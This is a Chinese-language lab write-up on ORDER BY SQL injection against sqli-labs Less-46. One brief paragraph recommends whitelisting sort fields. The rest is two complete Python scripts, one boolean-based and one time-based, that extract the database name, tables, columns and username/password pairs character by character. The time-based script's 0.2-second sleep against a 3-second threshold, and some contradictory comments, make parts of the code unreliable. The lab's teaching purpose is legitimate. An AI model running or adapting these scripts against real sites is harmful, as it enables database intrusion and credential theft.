order by布尔盲注、时间盲注
在 PDO 预处理防御下，order by、limit 处无法使用参数绑定，开发者往往直接把用户输入拼接进 SQL，因此这里仍可以进行 SQL 注入；防御时应对排序字段做白名单校验，而不是依赖预处理。
案例:靶场的less-46
布尔盲注:
import requests
from lxml import html
def get_id_one(URL, paload):
    """Send one probe request and return the text of the first table cell.

    The callers use this as their boolean oracle: the injected ``sort``
    expression flips the ORDER BY column, and the first ``<td>`` of the first
    row (compared against ``"1"`` by the callers) reveals which branch ran.

    Args:
        URL: Base URL of the lab page that is queried.
        paload: Query-string parameters sent with the GET request.

    Returns:
        The whitespace-stripped text of ``//table//tr[1]/td[1]``.

    Raises:
        IndexError: if the XPath matches nothing (no table in the response).
    """
    page = requests.get(url=URL, params=paload)
    doc = html.fromstring(page.content)
    # Only the first match is used; an empty match list raises IndexError.
    first_cell = doc.xpath('//table//tr[1]/td[1]/text()')[0]
    return first_cell.strip()
def get_database(URL):
    """Recover the current database name via the boolean ORDER BY oracle.

    Positions 1..9 of ``database()`` are probed; each character is found by a
    binary search over the ASCII range [32, 128) using ``get_id_one`` as the
    oracle (``"1"`` means "greater than mid"). Positions past the end of the
    name resolve to ``chr(32)``. The result is printed, not returned.

    Args:
        URL: Base URL of the lab page.

    NOTE(review): per the write-up above, the flaw is that ``sort`` is
    concatenated into ORDER BY; an allow-list of column names closes it.
    """
    chars = []
    for pos in range(1, 10):
        lo, hi = 32, 128
        # Invariant: the true ASCII value lies in [lo, hi); loop ends at lo == hi.
        while lo < hi:
            mid = (lo + hi) // 2
            probe = {
                "sort": f"if((ascii(substr(database(),{pos},1))>{mid}),id,username) -- "}
            if get_id_one(URL, probe) == "1":
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    print("数据库名称:" + "".join(chars))
def get_table(URL):
    """Recover table names of schema ``security`` via the boolean oracle.

    Probes positions 1..31 of ``group_concat(table_name)`` from
    ``information_schema.tables``; longer lists are truncated at 31
    characters. Each character is binary-searched over [32, 128) with
    ``get_id_one`` deciding "greater than mid" when it returns ``"1"``.
    The result is printed, not returned.

    Args:
        URL: Base URL of the lab page.
    """
    chars = []
    for pos in range(1, 32):
        lo, hi = 32, 128
        while lo < hi:
            mid = (lo + hi) // 2
            probe = {
                "sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{pos},1))>{mid}),id,username) -- "}
            if get_id_one(URL, probe) == "1":
                lo = mid + 1
            else:
                hi = mid
        # lo == hi here: the search converged on the character's code point.
        chars.append(chr(lo))
    print("表的名称:" + "".join(chars))
def get_column(URL):
    """Recover column names of ``security.users`` via the boolean oracle.

    Probes positions 1..31 of ``group_concat(column_name)`` from
    ``information_schema.columns`` (truncating longer lists). Each character
    is binary-searched over [32, 128) using ``get_id_one`` == ``"1"`` as the
    "greater than mid" signal. The result is printed, not returned.

    Args:
        URL: Base URL of the lab page.
    """
    chars = []
    for pos in range(1, 32):
        lo, hi = 32, 128
        while lo < hi:
            mid = (lo + hi) // 2
            probe = {
                "sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{pos},1))>{mid}),id,username) -- "}
            if get_id_one(URL, probe) == "1":
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    print("列的名称:" + "".join(chars))
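def get_result(URl):
    """Recover ``username>password`` pairs from ``users`` via the boolean oracle.

    Probes positions 1..31 of ``group_concat(username,0x3e,password)``
    (truncating longer output). Each character is binary-searched over
    [32, 128) with ``get_id_one`` == ``"1"`` meaning "greater than mid".
    The result is printed, not returned.

    Args:
        URl: Base URL of the lab page. (The parameter keeps its original
            spelling for compatibility; the original body ignored it and read
            a module-level ``URL`` instead, which only worked when called from
            this script's ``__main__`` block.)
    """
    chars = []
    for pos in range(1, 32):
        lo, hi = 32, 128
        while lo < hi:
            mid = (lo + hi) // 2
            probe = {
                "sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{pos},1))>{mid}),id,username) -- "}
            # Fix: query the URL passed in, not the module global.
            if get_id_one(URl, probe) == "1":
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    print("用户名及密码信息:" + "".join(chars))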
if __name__ == '__main__':
    # Local sqli-labs Less-46 instance. Keep the name URL: get_result's
    # parameter is spelled URl and its body reads this module-global URL.
    URL = "http://localhost/Less-46/"
    # Earlier steps are left commented out; run them one at a time.
    # get_database(URL)
    # get_table(URL)
    # get_column(URL)
    get_result(URL)
时间盲注:
import requests
import datetime
def get_database(URL):
    """Recover the current database name via a time-based ORDER BY oracle.

    Positions 1..9 of ``database()`` are probed. Each character is found by a
    binary search over [32, 128); the "greater than mid" signal is a response
    whose wall-clock duration has ``timedelta.seconds >= 3`` (whole seconds
    only, so sub-second delays never count). Prints the result, returns None.

    Args:
        URL: Base URL of the lab page.

    NOTE(review): the injected delay is ``sleep(0.2)`` while the threshold is
    3 whole seconds; whether the lab crosses it is not verifiable from here.
    """

    def took_long(probe):
        # True when the request took at least 3 whole seconds.
        started = datetime.datetime.now()
        requests.get(url=URL, params=probe)
        finished = datetime.datetime.now()
        return (finished - started).seconds >= 3

    chars = []
    for pos in range(1, 10):
        lo, hi = 32, 128
        while lo < hi:
            mid = (lo + hi) // 2
            probe = {
                "sort": f"if((ascii(substr(database(),{pos},1))>{mid}),sleep(0.2),id) -- "}
            if took_long(probe):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    print("数据库名称:" + "".join(chars))
def get_table(URL):
    """Recover table names of schema ``security`` via the time-based oracle.

    Probes positions 1..31 of ``group_concat(table_name)`` from
    ``information_schema.tables`` (longer lists are truncated). A character
    is binary-searched over [32, 128); a request whose duration reaches
    ``timedelta.seconds >= 3`` counts as "greater than mid". Prints the
    result, returns None.

    Args:
        URL: Base URL of the lab page.
    """

    def took_long(probe):
        # .seconds truncates to whole seconds; 3 s is the decision threshold.
        started = datetime.datetime.now()
        requests.get(url=URL, params=probe)
        finished = datetime.datetime.now()
        return (finished - started).seconds >= 3

    chars = []
    for pos in range(1, 32):
        lo, hi = 32, 128
        while lo < hi:
            mid = (lo + hi) // 2
            probe = {
                "sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{pos},1))>{mid}),sleep(0.2),id) -- "}
            if took_long(probe):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    print("表的名称:" + "".join(chars))
def get_column(URL):
    """Recover column names of ``security.users`` via the time-based oracle.

    Probes positions 1..31 of ``group_concat(column_name)`` from
    ``information_schema.columns`` (truncating longer lists). Each character
    is binary-searched over [32, 128); a request with
    ``timedelta.seconds >= 3`` is read as "greater than mid". Prints the
    result, returns None.

    Args:
        URL: Base URL of the lab page.
    """

    def took_long(probe):
        started = datetime.datetime.now()
        requests.get(url=URL, params=probe)
        finished = datetime.datetime.now()
        # Whole-second comparison, as in the other time-based helpers.
        return (finished - started).seconds >= 3

    chars = []
    for pos in range(1, 32):
        lo, hi = 32, 128
        while lo < hi:
            mid = (lo + hi) // 2
            probe = {
                "sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{pos},1))>{mid}),sleep(0.2),id) -- "}
            if took_long(probe):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    print("列的名称:" + "".join(chars))
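def get_result(URl):
    """Recover ``username>password`` pairs from ``users`` via the time-based oracle.

    Probes positions 1..31 of ``group_concat(username,0x3e,password)``
    (truncating longer output). Each character is binary-searched over
    [32, 128); a request whose duration reaches ``timedelta.seconds >= 3``
    is read as "greater than mid". Prints the result, returns None.

    Args:
        URl: Base URL of the lab page. (Original spelling kept for
            compatibility; the original body ignored this parameter and read
            a module-level ``URL``, so it only worked from this script's
            ``__main__`` block.)
    """

    def took_long(probe):
        # Whole-second comparison; sub-second delays never count.
        started = datetime.datetime.now()
        # Fix: query the URL passed in, not the module global.
        requests.get(url=URl, params=probe)
        finished = datetime.datetime.now()
        return (finished - started).seconds >= 3

    chars = []
    for pos in range(1, 32):
        lo, hi = 32, 128
        while lo < hi:
            mid = (lo + hi) // 2
            probe = {
                "sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{pos},1))>{mid}),sleep(0.2),id) -- "}
            if took_long(probe):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    print("用户名及密码信息:" + "".join(chars))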
if __name__ == '__main__':
    # Local sqli-labs Less-46 instance. Keep the name URL: get_result's
    # parameter is spelled URl and its body reads this module-global URL.
    URL = "http://localhost/Less-46/"
    # Earlier steps are left commented out; run them one at a time.
    # get_database(URL)
    # get_table(URL)
    # get_column(URL)
    get_result(URL)